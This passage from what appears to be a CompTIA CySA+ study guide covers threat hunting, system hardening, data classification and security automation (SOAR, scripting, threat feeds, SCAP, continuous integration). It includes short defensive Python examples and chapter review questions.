disregard the threats of any threat actors that fall outside these
three categories. Lone actors or smaller groups that use hacking
as a means to discover and exploit any discovered vulnerability
can cause damage just like the larger, more organized groups.
Hacker and cracker are two terms that are often used
interchangeably in media but do not actually have the same
meaning. Hackers are individuals who attempt to break into secure systems to obtain knowledge about the systems, without using that knowledge for any nefarious purposes. Crackers, on the other hand, are individuals who break into secure systems intending to use the knowledge gained to carry out pranks or commit crimes. Hacktivists are a newer group: activists for a cause, such as animal rights, who use hacking as a means to get their message out and affect the businesses that they feel are detrimental to their cause.
In the security world, the terms white hat, gray hat, and black
hat are more easily understood and less often confused than the
terms hackers and crackers. A white hat does not have any
malicious intent. A black hat has malicious intent. A gray hat is
somewhere between the other two. A gray hat may, for example,
break into a system, notify the administrator of the security
hole, and offer to fix the security issues for a fee. Threat actors
use a variety of techniques to gather the information required to
gain a foothold.
THREAT HUNTING TACTICS
Security analysts use various techniques in the process of
anticipating and identifying threats. Some of these methods
revolve around network surveillance and others involve
examining the behaviors of individual systems.
Hunt Teaming
Hunt teaming is a new approach to security that is offensive in
nature rather than defensive, which has been the common
approach of security teams in the past. Hunt teams work
together to detect, identify, and understand advanced and
determined threat actors. Hunt teaming is covered in Chapter 8,
“Security Solutions for Infrastructure Management.”
Threat Model
A threat model is a conceptual design that attempts to
provide a framework on which to implement security efforts.
Many models have been created. Let’s say, for example, that you
have an online banking application and need to assess the
points at which the application faces threats. Figure 13-2 shows
how a threat model in the form of a data flow diagram might be
created using the Open Web Application Security Project
(OWASP) approach to identify where the trust boundaries are
located.
Threat modeling tools go beyond these simple data flow
diagrams. The following are some recent tools:
Microsoft Threat Modeling Tool (formerly SDL Threat Modeling Tool) identifies threats based on the STRIDE threat classification scheme.
ThreatModeler identifies threats based on a customizable
comprehensive threat library and is intended for collaborative use
across all organizational stakeholders.
IriusRisk offers both community and commercial versions of a
tool that focuses on the creation and maintenance of a live threat
model through the entire software development life cycle (SDLC). It
connects with several different tools to empower automation.
securiCAD focuses on threat modeling of IT infrastructures using a computer-aided design (CAD) approach where assets are automatically or manually placed on a drawing pane.
SD Elements is a software security requirements management
platform that includes automated threat modeling capabilities.
Figure 13-2 OWASP Threat Model
Executable Process Analysis
When the processor is very busy even though little or nothing is running to generate that activity, it can be a sign that the processor is working on behalf of malicious software; this is one of the key reasons a compromise is typically accompanied by a drop in performance. Executable process analysis allows you to determine whether this is the case. While Task Manager in Windows is designed to help with this, it has some limitations. For one, when you attempt to use it, you are typically already in a resource crunch, so it takes a while to open. By the time it does open, the CPU has often settled back down, and you have no way of knowing what caused the spike.
By using Task Manager, you can determine what process is
causing a bottleneck at the CPU. For example, Figure 13-3
shows that in Task Manager, you can click the Processes tab and
then click the CPU column to sort the processes with the top
CPU users at the top. In Figure 13-3, the top user is Task
Manager, which makes sense since it was just opened.
Figure 13-3 Task Manager
A better tool is Process Explorer, part of the free Sysinternals suite available at https://docs.microsoft.com/sysinternals/. Process Explorer enables you to see the top CPU offender in the Notification area without even opening Task Manager. Moreover, Process Explorer enables you to look at the graph that appears in Task Manager and identify what caused spikes in the past, which is not possible with Task Manager alone. In Figure 13-4, you can see that Process Explorer breaks down each process into its subprocesses.
An example of using these tools for threat hunting is to proactively look for dates and times when processor usage is high even though system usage is typically low, which can indicate a malicious process at work.
Figure 13-4 Process Explorer
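To make this kind of analysis repeatable, an analyst can script it. The following is a minimal sketch using the third-party psutil library (an assumption: it has been installed with pip); it samples CPU usage for one second and prints the top consumers, much like sorting the CPU column in Task Manager.

```python
# Minimal executable process analysis sketch using psutil (pip install psutil).
import psutil

def top_cpu_processes(count=5, interval=1.0):
    procs = list(psutil.process_iter(['pid', 'name']))
    for p in procs:
        try:
            p.cpu_percent(None)  # prime the counter; the first call returns 0.0
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            pass
    psutil.cpu_percent(interval=interval)  # wait one sampling interval
    usage = []
    for p in procs:
        try:
            usage.append((p.cpu_percent(None), p.info['pid'], p.info['name']))
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            pass
    return sorted(usage, reverse=True)[:count]

if __name__ == '__main__':
    for pct, pid, name in top_cpu_processes():
        print(f'{pct:5.1f}%  pid={pid:<6}  {name}')
```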
Memory Consumption
Another key indicator of a compromised host is increased memory consumption. It is often an indication that additional programs have been loaded into RAM so that they can be executed; once loaded, they use RAM in the process of carrying out their tasks, whatever those may be. You can
monitor memory consumption by using the same approach you
use for CPU consumption. If memory usage cannot be
accounted for, you should investigate it. (Review what you
learned about buffer overflows, which are attacks that may
display symptoms of increased memory consumption.)
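A similar sketch can flag unexplained memory consumption. This again assumes the third-party psutil library; the threshold is an illustrative value that would be tuned to the host's normal baseline.

```python
# Minimal memory consumption check using psutil (pip install psutil).
import psutil

THRESHOLD_MB = 500  # illustrative threshold; tune for the host's baseline

for proc in psutil.process_iter(['pid', 'name', 'memory_info']):
    try:
        rss_mb = proc.info['memory_info'].rss / (1024 * 1024)
        if rss_mb > THRESHOLD_MB:
            print(f"Investigate: {proc.info['name']} (pid {proc.info['pid']}) "
                  f"using {rss_mb:.0f} MB")
    except (psutil.NoSuchProcess, psutil.AccessDenied):
        continue
```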
REDUCING THE ATTACK SURFACE AREA
Reducing the attack surface area means limiting the features
and functions that are available to an attacker. For example, if I
lock all doors to the facility with the exception of one, I have
reduced the attack surface. Another term for reducing the attack surface area is system hardening, because it involves ensuring that all systems have been hardened to the extent possible while still providing functionality.
System Hardening
Another of the ongoing goals of operations security is to ensure that all systems have been hardened to the extent possible while still providing functionality. System hardening can be accomplished on both a physical and a logical basis. From a logical perspective:
Remove unnecessary applications.
Disable unnecessary services.
Block unrequired ports (see the sketch following these lists).
Tightly control the connecting of external storage devices and
media, if allowed at all.
System hardening is also done at the physical layer. Physical security was covered in Chapter 7, but some examples include
Fences around the facility
Locks on the doors
Disabled USB ports
Display filters
Clean desk policy
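As referenced above, the "block unrequired ports" step can be audited with a short script. The following minimal sketch compares listening TCP ports against an approved baseline; it assumes the third-party psutil library, may need administrative privileges on some operating systems, and uses a hypothetical baseline.

```python
# Minimal hardening audit: flag listening TCP ports outside an approved set.
import psutil

APPROVED_PORTS = {22, 443}  # hypothetical baseline for this host

listening = {c.laddr.port for c in psutil.net_connections(kind='tcp')
             if c.laddr and c.status == psutil.CONN_LISTEN}
for port in sorted(listening - APPROVED_PORTS):
    print(f'Unapproved listening port: {port}')
```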
Configuration Lockdown
Configuration lockdown (sometimes also called system
lockdown) is a setting that can be implemented on devices
including servers, routers, switches, firewalls, and virtual hosts.
You set it on a device after that device is correctly configured,
and it prevents any changes to the configuration, even by users
who formerly had the right to configure the device. This setting
helps support change control.
Full tests for functionality of all services and applications should
be performed prior to implementing this setting. Many products
that provide this functionality offer a test mode, in which you
can log any problems the current configuration causes without
allowing the problems to completely manifest on the network.
This allows you to identify and correct any problems prior to
implementing full lockdown.
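Configuration lockdown itself is a product feature, but its change-control goal can be supported with simple monitoring. The following minimal sketch, with a hypothetical file path, records a SHA-256 baseline of a configuration file and alerts when the current file no longer matches it.

```python
# Minimal change-detection sketch in support of configuration lockdown.
import hashlib

CONFIG_PATH = '/etc/myservice.conf'  # hypothetical configuration file

def sha256_of(path):
    with open(path, 'rb') as f:
        return hashlib.sha256(f.read()).hexdigest()

baseline = sha256_of(CONFIG_PATH)   # record at lockdown time
# ... later, on a schedule ...
if sha256_of(CONFIG_PATH) != baseline:
    print('ALERT: configuration changed outside change control')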
BUNDLING CRITICAL ASSETS
While organizations should strive to protect all assets, in the cybersecurity world we tend to focus on what is at risk in cyberspace: our data. Bundling these critical digital assets helps to organize them so that security controls can be applied more cleanly, with fewer opportunities for human error. Before bundling can be done, data must be classified. Data classification is covered in Chapter 6. Let's talk about classification levels.
Commercial Business Classifications
Commercial businesses usually classify data using four main
classification levels, listed here from highest sensitivity level to
lowest:
1. Confidential
2. Private
3. Sensitive
4. Public
Data that is confidential includes trade secrets, intellectual property, application programming code, and other data that could seriously affect the organization if unauthorized disclosure occurred. Data at this level would be available only to personnel in the organization whose work relates to the data's subject.
Access to confidential data usually requires authorization for
each access. In the United States, confidential data is exempt
from disclosure under the Freedom of Information Act. In most
cases, the only way for external entities to have authorized
access to confidential data is as follows:
After signing a confidentiality agreement
When complying with a court order
As part of a government project or contract procurement agreement
Data that is private includes any information related to
personnel, including human resources records, medical records,
and salary information, that is used only within the
organization. Data that is sensitive includes organizational
financial information and requires extra measures to ensure its
CIA and accuracy. Public data is data whose disclosure would
not cause a negative impact on the organization.
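One way to see how bundling pays off is to drive control selection from the classification label rather than from each individual asset. The following minimal sketch uses the commercial levels above; the control names and asset names are illustrative, not a prescribed control set.

```python
# Minimal sketch: apply controls per classification bundle, not per asset.
CONTROLS = {
    'confidential': ['per-access authorization', 'encryption at rest'],
    'private':      ['role-based access', 'encryption at rest'],
    'sensitive':    ['integrity controls', 'access logging'],
    'public':       ['integrity controls'],
}

assets = [('trade_secrets.db', 'confidential'), ('hr_records.db', 'private')]
for name, level in assets:
    print(f'{name}: apply {CONTROLS[level]}')
```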
Military and Government Classifications
Military and government entities usually classify data using five
main classification levels, listed here from highest sensitivity
level to lowest:
1. Top secret: Data that is top secret includes weapon blueprints,
technology specifications, spy satellite information, and other
military information that could gravely damage national security if
disclosed.
2. Secret: Data that is secret includes deployment plans, missile
placement, and other information that could seriously damage
national security if disclosed.
3. Confidential: Data that is confidential includes patents, trade
secrets, and other information that could seriously affect the
government if unauthorized disclosure occurred.
4. Sensitive but unclassified: Data that is sensitive but
unclassified includes medical or other personal data that might not
cause serious damage to national security but could cause citizens
to question the reputation of the government.
5. Unclassified: Military and government information that does not fall into any of the other four categories is considered unclassified and usually must be released to the public when requested under the Freedom of Information Act.
Distribution of Critical Assets
One strategy that can help support resiliency is to ensure that
critical assets are not all located in the same physical location.
Collocating critical assets leaves your organization open to the
kind of nightmare that occurred in 2017 at the Atlanta airport.
When a fire took out the main and backup power systems
(which were located together), the busiest airport in the world
went dark for over 12 hours. Distribution of critical assets
certainly enhances resilience.
ATTACK VECTORS
An attack vector is a segment of the communication path that
an attack uses to access a vulnerability. Each attack vector can
be thought of as comprising a source of malicious content, a
potentially vulnerable processor of that malicious content, and
the nature of the malicious content itself.
Recall from Chapter 2, “Utilizing Threat Intelligence to Support
Organizational Security,” that the Common Vulnerability
Scoring System (CVSS) has as part of its Base metric group a
metric called Attack Vector (AV). AV describes how the attacker
would exploit the vulnerability and has four possible values:
L: Stands for Local and means that the attacker must have physical
or logical access to the affected system.
A: Stands for Adjacent network and means that the attacker must
be on the local network.
N: Stands for Network and means that the attacker can exploit the vulnerability remotely, from any network.
P: Stands for Physical and requires the attacker to physically touch
or manipulate the vulnerable component.
Analysts can use the accumulated CVSS information regarding
attacks to match current characteristics of indicators of
compromise to common attacks.
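For example, an analyst script can pull the AV metric out of a CVSS v3.x vector string when triaging indicators. The following is a minimal sketch; the sample vector is illustrative.

```python
# Minimal sketch: extract the Attack Vector (AV) metric from a CVSS v3.x vector.
AV_NAMES = {'L': 'Local', 'A': 'Adjacent network', 'N': 'Network', 'P': 'Physical'}

def attack_vector(vector):
    for metric in vector.split('/'):
        if metric.startswith('AV:'):
            return AV_NAMES.get(metric.split(':')[1], 'Unknown')
    return 'Unknown'

print(attack_vector('CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'))  # Network
```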
INTEGRATED INTELLIGENCE
Integrated intelligence refers to the consideration and
analysis of intelligence data from a perspective that combines
multiple data sources and attempts to make inferences based on
this data integration. Many vendors of security software and appliances tout the intelligence integration capabilities of their products. SIEM systems are a good example, as described
in Chapter 11, “Analyzing Data as Part of Security Monitoring
Activities.”
The Integrated Intelligence Center (IIC) is a unit at the Center
for Internet Security (CIS) that focuses on merging
cybersecurity and physical security to aid governments in
dealing with emerging threats. IIC attempts to create predictive
models using the multiple data sources at its disposal.
IMPROVING DETECTION CAPABILITIES
Detection of events and incidents as they occur is critical.
Organizations should be constantly trying to improve their
detection capabilities.
Continuous Improvement
Security professionals can never just sit back, relax, and enjoy
the ride. Security needs are always changing because the “bad
guys” never take a day off. It is therefore vital that security
professionals continuously work to improve their organization’s
security. Tied into this is the need to improve the quality of the
security controls currently implemented. Quality improvement
commonly uses a four-step quality model, known as Deming's Plan–Do–Check–Act cycle, the steps for which are as follows:
1. Plan: Identify an area for improvement and make a formal plan to
implement it.
2. Do: Implement the plan on a small scale.
3. Check: Analyze the results of the implementation to determine
whether it made a difference.
4. Act: If the implementation made a positive change, implement it
on a wider scale. Continuously analyze the results.
None of this can be done without establishing metrics to determine how successful you currently are.
Continuous Monitoring
Any logging and monitoring activities should be part of an
organizational continuous monitoring program. The continuous
monitoring program must be designed to meet the needs of the
organization and implemented correctly to ensure that the
organization’s critical infrastructure is guarded. Organizations
may want to look into Continuous Monitoring as a Service
(CMaaS) solutions deployed by cloud service providers.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 13-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 13-2 Key Topics in Chapter 13
Key Topic Element | Description | Page Number
Figure 13-1 | Scientific method | 404
Figure 13-2 | OWASP threat model | 406
Bulleted list | Threat modeling tools | 407
Bulleted list | System hardening | 410
Numbered list | Commercial business classifications | 411
Numbered list | Military and government classifications | 412
Numbered list | Deming's Plan–Do–Check–Act cycle | 413
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
threat actors
hacker
cracker
hunt teaming
threat model
executable process analysis
Process Explorer
system hardening
configuration lockdown
sensitivity
criticality
attack vector
integrated intelligence
REVIEW QUESTIONS
1. Place the following steps of the scientific method in order.
Analyze the results
Conduct an experiment
Make a conclusion
Ask a question
State a hypothesis
2. List and describe at least one threat modeling tool.
3. ____________________ allows you to determine when
a CPU is struggling with malware.
4. Match the following terms with their definitions.
Terms:
1. System hardening
2. Configuration lockdown
3. Data classification policy
4. Sensitivity
5. Criticality
Definitions:
a. Prevents any changes to the configuration, even by users who formerly had the right to configure the device
b. Critical to all systems to protect the confidentiality, integrity, and availability (CIA) of data
c. A measure of how freely data can be handled
d. Ensures that all systems have been secured to the fullest extent possible and still provide functionality
e. A measure of the importance of the data
5. List the military/government data classification levels in
order.
6. A(n) _____________________ is a segment of the
communication path that an attack uses to access a
vulnerability.
7. Match the following terms with their definitions.
Terms:
1. Intelligence integration
2. CMaaS
3. Hunt teaming
4. State sponsor
Definitions:
a. Solution deployed by cloud service providers for improvement
b. Foreign government interested in pilfering data, including intellectual property
c. The consideration and analysis of intelligence data from a perspective that combines multiple data sources and attempts to make inferences based on this data integration
d. New approach to security that is offensive in nature rather than defensive, which has been common for security teams in the past
8. List at least two hardening techniques.
9. Data should be classified based on its _____________ to
the organization and its ____________ to disclosure.
10. Match the following terms with their definitions.
Terms:
1. Process Explorer
2. Hypothesis
3. Black hat
4. Threat model
Definitions:
a. A proposed explanation of something
b. Actor with malicious intent
c. Enables you to look at the graph that appears in Task Manager and identify what caused spikes in the past, which is not possible with Task Manager alone
d. A conceptual design that attempts to provide a framework on which to implement security efforts
Chapter 14
Automation Concepts and
Technologies
This chapter covers the following topics related to Objective 3.4
(Compare and contrast automation concepts and technologies) of
the CompTIA Cybersecurity Analyst (CySA+) CS0-002
certification exam:
Workflow orchestration: Describes the process of Security
Orchestration, Automation, and Response (SOAR) and its role in
security.
Scripting: Reviews the scripting process and its role in
automation.
Application programming interface (API) integration: Describes how this process governs access to an application's internal functions through an API.
Automated malware signature creation: Identifies an
automated process of malware identification.
Data enrichment: Discusses processes used to enhance, refine, or
otherwise improve raw data.
Threat feed combination: Defines a process for making use of
data from multiple intelligence feeds.
Machine learning: Describes the role machine learning plays in
automated security.
Use of automation protocols and standards: Identifies
various protocols and standards, including Security Content
Automation Protocol (SCAP), and their application.
Continuous integration: Covers the process of ongoing
integration of software components during development.
Continuous deployment/delivery: Covers the process of
ongoing review and upgrade of software.
Traditionally, network operations and threat intelligence
activities were performed manually by technicians. Increasingly
in today’s environments, these processes are being automated
through the use of scripting and other automation tools. This
chapter explores how workflows can be automated.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these ten self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table
14-1 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 14-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section | Question
Workflow Orchestration | 1
Scripting | 2
Application Programming Interface (API) Integration | 3
Automated Malware Signature Creation | 4
Data Enrichment | 5
Threat Feed Combination | 6
Machine Learning | 7
Use of Automation Protocols and Standards | 8
Continuous Integration | 9
Continuous Deployment/Delivery | 10
1. Which of the following enables you to automate the response
to a security issue? (Choose the best answer.)
1. Orchestration
2. Piping
3. Scripting
4. Virtualization
2. Which scripting language is used to work in the Linux
interface?
1. Python
2. Bash
3. Ruby
4. Perl
3. Which of the following is used to provide integration
between your website and a payment gateway?
1. Perl
2. Orchestration
3. API
4. Scripting
4. Which of the following is an additional method of
identifying malware?
1. DHCP snooping
2. DAI
3. Automated malware signature creation
4. Piping
5. When you receive bulk e-mail from a vendor and it refers to
you by first name, what technique is in use?
1. Scripting
2. Orchestration
3. Heuristics
4. Data enrichment
6. Threat feeds inform the recipient about all but which of the
following?
1. Presence of malware on the recipient
2. Suspicious domains
3. Lists of known malware hashes
4. IP addresses associated with malicious activity
7. Which of the following is an example of machine learning?
1. NAC
2. AEG
3. EDR
4. DLP
8. Which of the following is a standard that the security
automation community uses to enumerate software flaws
and configuration issues?
1. NAC
2. DAC
3. SCAP
4. DLP
9. Which of the following is a software development practice
whereby the work of multiple individuals is combined a
number of times a day?
1. Sinkholing
2. Continuous integration
3. Aggregation
4. Inference
10. Which of the following is considered the next generation of
DevOps and attempts to make sure that software developers
can release new product changes to customers quickly in a
sustainable way?
1. Agile
2. DevSecOps
3. Continuous deployment/delivery
4. Scrum
FOUNDATION TOPICS
WORKFLOW ORCHESTRATION
Workflow orchestration is the sequencing of events based
on certain parameters by using scripting and scripting tools.
Over time orchestration has been increasingly used to automate
processes that were formerly carried out manually by humans.
In virtualization, it is quite common to use orchestration. For example, in the VMware world, technicians can create what are called vApps, groups of virtual machines that are managed and orchestrated as a unit to provide a service to users. Using orchestration tools, you can set one device to always boot before another device. For example, in a Windows Active Directory environment, you may need the domain controller (DC) to boot up before the database server so that the database server can properly authenticate to the DC and function correctly.
Figure 14-1 shows another, more complex automated workflow
orchestration using VMware vCloud Automation Center (vCAC).
Figure 14-1 Workflow Orchestration
The workflow is sequenced to occur in the following fashion:
1. A request comes in to write to the disk.
2. The disk space is checked.
3. Insufficient space is found.
4. A change request is generated for more space.
5. A disk is added.
6. The configuration database is updated.
7. The user is notified.
While this is one use of workflow orchestration (a scripted sketch of this flow follows the list below), it can also be used in the security world. Examples include
Dynamic incident response plans that adapt in real time
Automated workflows to empower analysts and enable faster
response
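As referenced above, the disk-space workflow can be expressed as a short orchestration script. The following minimal sketch chains the steps in order; every function is a hypothetical stand-in for a real infrastructure or ticketing call.

```python
# Minimal sketch of the disk-space workflow: each step runs in sequence.
def open_change_request(summary):
    print('change request:', summary)        # step 4
    return 'CHG-0001'

def add_disk():
    print('disk added')                       # step 5

def update_config_db(ticket):
    print('CMDB updated for', ticket)         # step 6

def notify_user(msg):
    print('user notified:', msg)              # step 7

def handle_write_request(required_gb, free_gb):
    if free_gb < required_gb:                  # steps 2-3: space check fails
        ticket = open_change_request('add disk')
        add_disk()
        update_config_db(ticket)
        notify_user('disk added, write retried')

handle_write_request(required_gb=100, free_gb=20)   # step 1: incoming request
```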
SCRIPTING
Scripting languages and scripting tools are used to automate a
process. Common scripting languages include
bash: Used to work in the Linux interface
Node.js: Framework to write network applications using JavaScript
Ruby: Great for web development
Python: Supports procedure-oriented programming and object-oriented programming
Perl: Found on all Linux servers, helps in text manipulation tasks
Windows PowerShell: Found on all Windows servers
Scripting tools that require less knowledge of the actual syntax
of the language can also be used, such as
Puppet
Chef
Ansible
For example, Figure 14-2 shows Puppet being used to automate
the update of Apache servers.
Figure 14-2 Puppet Orchestration
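As a simple illustration of scripting for security automation, the following Python sketch counts failed SSH logins per source address. The log path and the message format are assumptions about a typical Linux host.

```python
# Minimal scripting sketch: count failed SSH logins per source IP.
import re
from collections import Counter

failures = Counter()
with open('/var/log/auth.log') as log:   # hypothetical log location
    for line in log:
        m = re.search(r'Failed password .* from (\d+\.\d+\.\d+\.\d+)', line)
        if m:
            failures[m.group(1)] += 1

for ip, count in failures.most_common(5):
    print(f'{ip}: {count} failed logins')
```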
APPLICATION PROGRAMMING
INTERFACE (API) INTEGRATION
As a review, an API is a set of clearly defined methods of communication between various software components. As such, you should think of an API as a connection point that requires security consideration. For example, an API between your e-commerce site and a payment gateway must be secure. So, what is API integration and why is it important?
API integration means that the applications on either end of
the API are synchronized and protecting the integrity of the
information that passes across the API. It also enables the
proper updating and versioning required in many
environments. The term also describes the relationship between
a website and an API when the API is integrated into the
website.
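A minimal sketch of the payment-gateway example follows, using the third-party requests library over TLS with token authentication. The endpoint URL and token are hypothetical placeholders, not a real gateway's API.

```python
# Minimal API integration sketch: authenticated call over TLS.
import requests

resp = requests.post(
    'https://payments.example.com/api/v1/charge',   # hypothetical endpoint
    json={'amount': 1999, 'currency': 'USD'},
    headers={'Authorization': 'Bearer <API_TOKEN>'},
    timeout=10,
)
resp.raise_for_status()        # surface HTTP errors instead of ignoring them
print(resp.json())
```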
AUTOMATED MALWARE SIGNATURE
CREATION
Automated malware signature creation is an additional
method of identifying malware. The antivirus software monitors
incoming unknown files for the presence of malware and
analyzes each file based on both classifiers of file behavior and
classifiers of file content. The file is then classified as having a
particular malware classification. Subsequently, a malware
signature is generated for the incoming unknown file based on
the particular malware classification. This malware signature
can be used by an antivirus program as a part of the antivirus
program’s virus identification processes.
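The signature-generation step alone can be sketched simply: once a classifier has labeled a sample, derive a content signature that scanners can match later. This sketch uses a plain SHA-256 hash; real products combine behavioral and content classifiers with richer signature formats.

```python
# Minimal sketch of the signature-generation step after classification.
import hashlib

def make_signature(path, classification):
    with open(path, 'rb') as f:
        digest = hashlib.sha256(f.read()).hexdigest()
    return {'sha256': digest, 'family': classification}

# Hypothetical usage after a classifier labels the sample:
print(make_signature('sample.bin', 'trojan.generic'))
```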
DATA ENRICHMENT
Data enrichment is a technique that allows one process to gather information from another process or source and then customize a response to a third party using the data from the second process or source. When you receive bulk e-mail from a vendor and it refers to you by first name, that is an example of data enrichment in use. In that case, a file of e-mail addresses and names (the second source) is consulted, and your name is added to the message sent to you.
Another common data enrichment process would, for example,
correct likely misspellings or typographical errors in a database
by using precision algorithms designed for that purpose.
Another way in which data enrichment can work is by
extrapolating data.
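A minimal sketch of the mechanism: an alert from one source is enriched with context from a second source before being passed on. The reputation table below stands in for an external feed.

```python
# Minimal data enrichment sketch: add context from a second source to an alert.
REPUTATION = {'203.0.113.7': 'known C2 server'}   # hypothetical second source

def enrich(alert):
    alert['reputation'] = REPUTATION.get(alert['src_ip'], 'unknown')
    return alert

print(enrich({'src_ip': '203.0.113.7', 'event': 'outbound connection'}))
```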
Data enrichment can create a privacy issue, one addressed by the EU General Data Protection Regulation (GDPR), which includes provisions that limit data enrichment for this very reason. Users typically have a reasonable idea about which information they have provided to a specific organization, but if the organization adds information from other databases, this picture is skewed: the organization will hold information about them of which they are not aware.
Figure 14-3 shows another security-related example of the data
enrichment process. This is an example of an automated
process used by a security analytics platform called Blue Coat.
The data enrichment part of the process occurs at Steps 4 and 5
when information from an external source is analyzed and used
to enrich the alert message that is generated from the file
detected.
Figure 14-3 Data Enrichment Process Example
THREAT FEED COMBINATION
A threat feed is a constantly updating stream of intelligence about threat indicators and artifacts that is delivered by a third-party security organization. Threat feeds are used to inform the organization as quickly as possible about new threats that have been identified. Threat feeds contain information including
Suspicious domains
Lists of known malware hashes
IP addresses associated with malicious activity
Chapter 11, “Analyzing Data as Part of Security Monitoring
Activities,” described how a SIEM aggregates the logs from
various security devices into a single log for analysis. By
analyzing the single aggregated log, inferences can be made
about potential issues or attacks that would not be possible if
the logs were analyzed separately.
Using SIEM (or other aggregation tools) to aggregate threat
feeds can also be beneficial, and tools and services such as the
following offer this type of threat feed combination:
Combine: Gathers threat intelligence feeds from publicly available
sources
Palo Alto Networks AutoFocus: Provides intelligence,
correlation, added context, and automated prevention workflows
Anomali ThreatStream: Helps deduplicate data, removes false
positives, and feeds intelligence to security tools
ThreatQuotient: Helps accelerate security operations with an
integrated threat library and shared contextual intelligence
ThreatConnect: Combines external threat data from trusted
sources with in-house data
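At its simplest, threat feed combination is merging and deduplicating indicator lists while tracking which feeds agree. The following minimal sketch uses illustrative feed contents.

```python
# Minimal threat feed combination sketch: merge, deduplicate, track sources.
from collections import defaultdict

feeds = {
    'feed_a': ['evil.example', '198.51.100.9'],
    'feed_b': ['198.51.100.9', 'bad.example'],
}

combined = defaultdict(set)
for feed_name, indicators in feeds.items():
    for indicator in indicators:
        combined[indicator].add(feed_name)

for indicator, sources in combined.items():
    print(indicator, 'seen in', sorted(sources))
```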
MACHINE LEARNING
Artificial intelligence (AI) and machine learning have fascinated humans for decades. AI is the capability of a computer system to make decisions using human-like intelligence. Machine learning is one way to make that possible: algorithms enable the system to learn from what it sees and to apply what it learns. Ever since we first conceived of talking to a computer and getting an answer, as characters did in the comic books of years past, we have waited for the day when smart robots would not just do the dirty work but also learn just as humans do.
Today, robots are taking on increasingly more and more
detailed work. One of the exciting areas where AI and machine
learning are yielding dividends is in intelligent network security
—or the intelligent network. These networks seek out their own
vulnerabilities before attackers do, learn from past errors, and
work on a predictive model to prevent attacks.
For example, automatic exploit generation (AEG) is the “first end-to-end system for fully automatic exploit generation,” according to Carnegie Mellon University's own description of its AI named Mayhem. Developed for off-the-shelf software as well as the enterprise software increasingly used in smart devices and appliances, AEG can find a bug and determine whether it is exploitable.
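As a small taste of machine learning applied to security data, the following sketch trains an anomaly detector on "normal" activity and flags an outlier. It assumes the third-party scikit-learn library, and the training data is illustrative.

```python
# Minimal anomaly detection sketch with scikit-learn's IsolationForest.
from sklearn.ensemble import IsolationForest

normal = [[9, 120], [10, 150], [11, 130], [14, 160], [15, 140]]  # hour, MB
model = IsolationForest(random_state=0).fit(normal)

suspect = [[3, 4000]]                 # 3 a.m., 4 GB transferred
print(model.predict(suspect))         # -1 means anomalous, 1 means normal
```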
USE OF AUTOMATION PROTOCOLS AND
STANDARDS
As in almost every other area of IT, standards and protocols for
automation have emerged to help support the development and
sharing of threat information. As with all standards, the goal is
to arrive at common methods of sharing threat data.
Security Content Automation Protocol (SCAP)
Chapter 2, “Utilizing Threat Intelligence to Support
Organizational Security,” introduced the Common Vulnerability
Scoring System (CVSS), a common system for describing the
characteristics of a threat in a standard format. The ranking of
vulnerabilities that are discovered is based on predefined
metrics that also are used by the Security Content
Automation Protocol (SCAP). This is a standard that the security automation community uses to enumerate software flaws and configuration issues. It standardizes the nomenclature and formats used. A vendor of security automation products can obtain a validation against SCAP, demonstrating that its products will interoperate with other scanners and express scan results in a standardized way.
Understanding the operation of SCAP requires an understanding of its identification schemes, one of which (CVE) you have already learned about:
Common Configuration Enumeration (CCE): These are
configuration best practice statements maintained by the National
Institute of Standards and Technology (NIST).
Common Platform Enumeration (CPE): These are methods
for describing and classifying operating systems, applications, and
hardware devices.
Common Weakness Enumeration (CWE): These are design
flaws in the development of software that can lead to
vulnerabilities.
Common Vulnerabilities and Exposures (CVE): These are
vulnerabilities in published operating systems and applications
software.
A good example of the implementation of this is the Microsoft System Center Configuration Manager Extensions for SCAP. These extensions allow for the conversion of SCAP data files to Desired Configuration Management (DCM) Configuration Packs and convert DCM reports into SCAP format.
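Working with SCAP data often starts with parsing its identifiers. The following minimal sketch splits a CPE 2.3 formatted string into its named fields (it ignores escaped characters, which full parsers must handle); the sample string is illustrative.

```python
# Minimal sketch: parse a CPE 2.3 formatted string into named fields.
FIELDS = ['part', 'vendor', 'product', 'version', 'update', 'edition',
          'language', 'sw_edition', 'target_sw', 'target_hw', 'other']

def parse_cpe(cpe):
    parts = cpe.split(':')
    assert parts[0] == 'cpe' and parts[1] == '2.3', 'not a CPE 2.3 string'
    return dict(zip(FIELDS, parts[2:]))

print(parse_cpe('cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*'))
```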
CONTINUOUS INTEGRATION
Continuous integration is a software development practice
whereby the work of multiple individuals is combined a number
of times a day. The idea behind this is to identify bugs as early as possible in the development process. As it relates to security,
the goal of continuous integration is to locate security issues as
soon as possible. Continuous integration security testing
improves code integrity, leads to more secure software systems,
and reduces the time it takes to release new updates. Usually,
merging all development versions of the code base occurs
multiple times throughout a day. Figure 14-4 illustrates this
process.
Figure 14-4 Continuous Integration
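A continuous integration pipeline can enforce security checks as a gate on every merge. The following minimal sketch runs a test suite and a dependency audit and fails the build if either step fails; the tool choices (pytest and pip-audit) are assumptions about the project.

```python
# Minimal CI security gate sketch: fail the build if any step fails.
import subprocess
import sys

steps = [
    ['pytest', '-q'],     # unit tests
    ['pip-audit'],        # dependency vulnerability scan (assumed installed)
]

for step in steps:
    result = subprocess.run(step)
    if result.returncode != 0:
        print('CI gate failed at:', ' '.join(step))
        sys.exit(1)
print('CI gate passed; changes can be merged')
```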
CONTINUOUS DEPLOYMENT/DELIVERY
Taking continuous integration one step further is the concept of
